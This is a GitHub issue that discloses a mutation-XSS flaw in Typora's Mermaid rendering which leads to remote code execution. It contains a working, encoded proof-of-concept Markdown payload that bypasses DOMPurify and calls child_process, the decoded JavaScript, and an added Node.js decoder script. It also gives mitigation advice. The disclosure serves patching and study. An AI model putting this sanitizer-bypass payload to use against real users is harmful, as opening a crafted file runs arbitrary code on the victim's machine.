Typora RCE via mXSS #3124

Closed
0xBADCA7 opened this issue Dec 27, 2019 · 2 comments

0xBADCA7 commented Dec 27, 2019

Summary

An mXSS in Typora leads to remote code execution. The vector is Mermaid code blocks (HTML labels); however, other spots where Typora attempts to clean up HTML using DOMPurify could be prone to the same.

Steps to reproduce / PoC

  1. Create an .md with the following contents:
```mermaid
graph TD
z --> q{<svg></p><style><g title=&#x3c&#x73&#x76&#x67&#x3e&#x0a&#x22&#x3c&#x2f&#x73&#x74&#x79&#x6c&#x65&#x3e&#x3c&#x69&#x6d&#x67&#x20&#x73&#x72&#x63&#x20&#x6f&#x6e&#x65&#x72&#x72&#x6f&#x72&#x3d&#x65&#x76&#x61&#x6c&#x28&#x61&#x74&#x6f&#x62&#x28&#x27&#x64&#x48&#x4a&#x35&#x65&#x33&#x5a&#x68&#x63&#x69&#x42&#x79&#x50&#x58&#x4a&#x6c&#x63&#x57&#x35&#x76&#x5a&#x47&#x55&#x6f&#x4a&#x32&#x4e&#x6f&#x61&#x57&#x78&#x6b&#x58&#x33&#x42&#x79&#x62&#x32&#x4e&#x6c&#x63&#x33&#x4d&#x6e&#x4b&#x54&#x74&#x79&#x4c&#x6d&#x56&#x34&#x5a&#x57&#x4e&#x47&#x61&#x57&#x78&#x6c&#x4b&#x43&#x63&#x76&#x64&#x58&#x4e&#x79&#x4c&#x32&#x4a&#x70&#x62&#x69&#x39&#x6e&#x62&#x6d&#x39&#x74&#x5a&#x53&#x31&#x6a&#x59&#x57&#x78&#x6a&#x64&#x57&#x78&#x68&#x64&#x47&#x39&#x79&#x4a&#x79&#x6c&#x38&#x66&#x48&#x49&#x75&#x5a&#x58&#x68&#x6c&#x59&#x30&#x5a&#x70&#x62&#x47&#x55&#x6f&#x4a&#x32&#x4e&#x68&#x62&#x47&#x4d&#x75&#x5a&#x58&#x68&#x6c&#x4a&#x79&#x6c&#x39&#x59&#x32&#x46&#x30&#x59&#x32&#x68&#x37&#x64&#x32&#x6c&#x75&#x5a&#x47&#x39&#x33&#x4c&#x6d&#x4a&#x79&#x61&#x57&#x52&#x6e&#x5a&#x53&#x35&#x6a&#x59&#x57&#x78&#x73&#x53&#x47&#x46&#x75&#x5a&#x47&#x78&#x6c&#x63&#x69&#x67&#x6e&#x64&#x32&#x6c&#x75&#x5a&#x47&#x39&#x33&#x4c&#x6d&#x39&#x77&#x5a&#x57&#x34&#x6e&#x4c&#x43&#x41&#x6e&#x5a&#x6d&#x6c&#x73&#x5a&#x54&#x6f&#x76&#x4c&#x79&#x39&#x54&#x65&#x58&#x4e&#x30&#x5a&#x57&#x30&#x76&#x51&#x58&#x42&#x77&#x62&#x47&#x6c&#x6a&#x59&#x58&#x52&#x70&#x62&#x32&#x35&#x7a&#x4c&#x30&#x4e&#x68&#x62&#x47&#x4e&#x31&#x62&#x47&#x46&#x30&#x62&#x33&#x49&#x75&#x59&#x58&#x42&#x77&#x4c&#x30&#x4e&#x76&#x62&#x6e&#x52&#x6c&#x62&#x6e&#x52&#x7a&#x4c&#x30&#x31&#x68&#x59&#x30&#x39&#x54&#x4c&#x30&#x4e&#x68&#x62&#x47&#x4e&#x31&#x62&#x47&#x46&#x30&#x62&#x33&#x49&#x6e&#x4b&#x58&#x30&#x37&#x27&#x29&#x29&#x3e&#x22>}

```
  2. Open the file in Typora
  3. Witness a calculator pop up:

(screenshot: poc1)

The payload is simply HTML-entity-encoded:

```html
<svg></p><style><g title=</style><img src onerror=eval(atob('dHJ5e3ZhciByPXJlcW5vZGUoJ2NoaWxkX3Byb2Nlc3MnKTtyLmV4ZWNGaWxlKCcvdXNyL2Jpbi9nbm9tZS1jYWxjdWxhdG9yJyl8fHIuZXhlY0ZpbGUoJ2NhbGMuZXhlJyl9Y2F0Y2h7d2luZG93LmJyaWRnZS5jYWxsSGFuZGxlcignd2luZG93Lm9wZW4nLCAnZmlsZTovLy9TeXN0ZW0vQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwL0NvbnRlbnRzL01hY09TL0NhbGN1bGF0b3InKX07'))>}
```

where the JS is simply:

```js
try{var r=reqnode('child_process');r.execFile('/usr/bin/gnome-calculator')||r.execFile('calc.exe')}catch{window.bridge.callHandler('window.open', 'file:///System/Applications/Calculator.app/Contents/MacOS/Calculator')};
```

Fix

It's perhaps best to upgrade DOMPurify to the latest version which seems to address new mutation XSS vectors. It looks like the version that's shipped with Typora is somewhat old (1.0.4).

Consider employing a Content Security Policy for a broader mitigation. It appears that RCE via XSS emerges as a pattern among Typora's issues. Implementing a fine-tuned CSP is time consuming, but building a good policy step by step could prove worthwhile in the long run and cover users even when new XSS vectors are discovered.

Notes

Versions known to be vulnerable and tested are 0.9.81, 0.9.9.31.2 (3946). These are the latest downloads from the website (for Linux and MacOS respectively). I did not test the Windows version of the app.

CVSS 8.3

My take is CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

// Mark Art at Havoc Research
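The PoC label carries two encoding layers: HTML character references (with the trailing `;` omitted on every one, which HTML parsers accept in attribute values) wrapped around a base64 string fed to `eval(atob(...))`. The script below peels both off so the markup that reaches the sanitizer, and the JavaScript the `onerror` handler finally runs, can be read in the clear. This is an added example for this issue, not code from the report or from Typora; it assumes only Node.js and copies the label text from the PoC above.

```javascript
// Added example (not from the issue report or from Typora): decode the two
// encoding layers of the PoC Mermaid label. Plain Node.js, no dependencies.

// Label text from the PoC above (the part between `q{` and `}`), copied verbatim.
const POC_LABEL = '<svg></p><style><g title=&#x3c&#x73&#x76&#x67&#x3e&#x0a&#x22&#x3c&#x2f&#x73&#x74&#x79&#x6c&#x65&#x3e&#x3c&#x69&#x6d&#x67&#x20&#x73&#x72&#x63&#x20&#x6f&#x6e&#x65&#x72&#x72&#x6f&#x72&#x3d&#x65&#x76&#x61&#x6c&#x28&#x61&#x74&#x6f&#x62&#x28&#x27&#x64&#x48&#x4a&#x35&#x65&#x33&#x5a&#x68&#x63&#x69&#x42&#x79&#x50&#x58&#x4a&#x6c&#x63&#x57&#x35&#x76&#x5a&#x47&#x55&#x6f&#x4a&#x32&#x4e&#x6f&#x61&#x57&#x78&#x6b&#x58&#x33&#x42&#x79&#x62&#x32&#x4e&#x6c&#x63&#x33&#x4d&#x6e&#x4b&#x54&#x74&#x79&#x4c&#x6d&#x56&#x34&#x5a&#x57&#x4e&#x47&#x61&#x57&#x78&#x6c&#x4b&#x43&#x63&#x76&#x64&#x58&#x4e&#x79&#x4c&#x32&#x4a&#x70&#x62&#x69&#x39&#x6e&#x62&#x6d&#x39&#x74&#x5a&#x53&#x31&#x6a&#x59&#x57&#x78&#x6a&#x64&#x57&#x78&#x68&#x64&#x47&#x39&#x79&#x4a&#x79&#x6c&#x38&#x66&#x48&#x49&#x75&#x5a&#x58&#x68&#x6c&#x59&#x30&#x5a&#x70&#x62&#x47&#x55&#x6f&#x4a&#x32&#x4e&#x68&#x62&#x47&#x4d&#x75&#x5a&#x58&#x68&#x6c&#x4a&#x79&#x6c&#x39&#x59&#x32&#x46&#x30&#x59&#x32&#x68&#x37&#x64&#x32&#x6c&#x75&#x5a&#x47&#x39&#x33&#x4c&#x6d&#x4a&#x79&#x61&#x57&#x52&#x6e&#x5a&#x53&#x35&#x6a&#x59&#x57&#x78&#x73&#x53&#x47&#x46&#x75&#x5a&#x47&#x78&#x6c&#x63&#x69&#x67&#x6e&#x64&#x32&#x6c&#x75&#x5a&#x47&#x39&#x33&#x4c&#x6d&#x39&#x77&#x5a&#x57&#x34&#x6e&#x4c&#x43&#x41&#x6e&#x5a&#x6d&#x6c&#x73&#x5a&#x54&#x6f&#x76&#x4c&#x79&#x39&#x54&#x65&#x58&#x4e&#x30&#x5a&#x57&#x30&#x76&#x51&#x58&#x42&#x77&#x62&#x47&#x6c&#x6a&#x59&#x58&#x52&#x70&#x62&#x32&#x35&#x7a&#x4c&#x30&#x4e&#x68&#x62&#x47&#x4e&#x31&#x62&#x47&#x46&#x30&#x62&#x33&#x49&#x75&#x59&#x58&#x42&#x77&#x4c&#x30&#x4e&#x76&#x62&#x6e&#x52&#x6c&#x62&#x6e&#x52&#x7a&#x4c&#x30&#x31&#x68&#x59&#x30&#x39&#x54&#x4c&#x30&#x4e&#x68&#x62&#x47&#x4e&#x31&#x62&#x47&#x46&#x30&#x62&#x33&#x49&#x6e&#x4b&#x58&#x30&#x37&#x27&#x29&#x29&#x3e&#x22>';

// Decode numeric (hex and decimal) and the common named character references
// in a single pass, so a reference whose decoded text happens to look like
// another reference is not decoded twice. The trailing ';' is optional because
// the PoC omits it everywhere (&#x3c&#x73...) and HTML parsers still accept it.
function decodeEntities(s) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|(lt|gt|amp|quot|apos));?/gi, (m, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    return named[name.toLowerCase()];
  });
}

// Find the base64 argument of eval(atob('...')) in the decoded markup and
// decode it. Returns null when the markup carries no such call.
function extractAtobPayload(html) {
  const m = /atob\('([A-Za-z0-9+\/=]+)'\)/.exec(html);
  return m ? Buffer.from(m[1], 'base64').toString('utf8') : null;
}

// Whole chain: entity layer first, then the base64 layer inside it.
function decodePoc(label) {
  const markup = decodeEntities(label);
  return { markup, js: extractAtobPayload(markup) };
}

const { markup, js } = decodePoc(POC_LABEL);
console.log('markup after entity decoding:\n' + markup + '\n');
console.log('JavaScript run by the onerror handler:\n' + js);
```

Note that the decoded `title` value begins with `<svg>`, a newline and a `"` before the `</style><img ...>` part; that prefix is what turns the attribute value back into markup once the sanitized fragment is re-parsed, which is the mutation the report relies on.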

@0xBADCA7 (Author)

CVE-2019-20374 was allocated for this one.

@abnerlee (Contributor)

Fixed in latest version
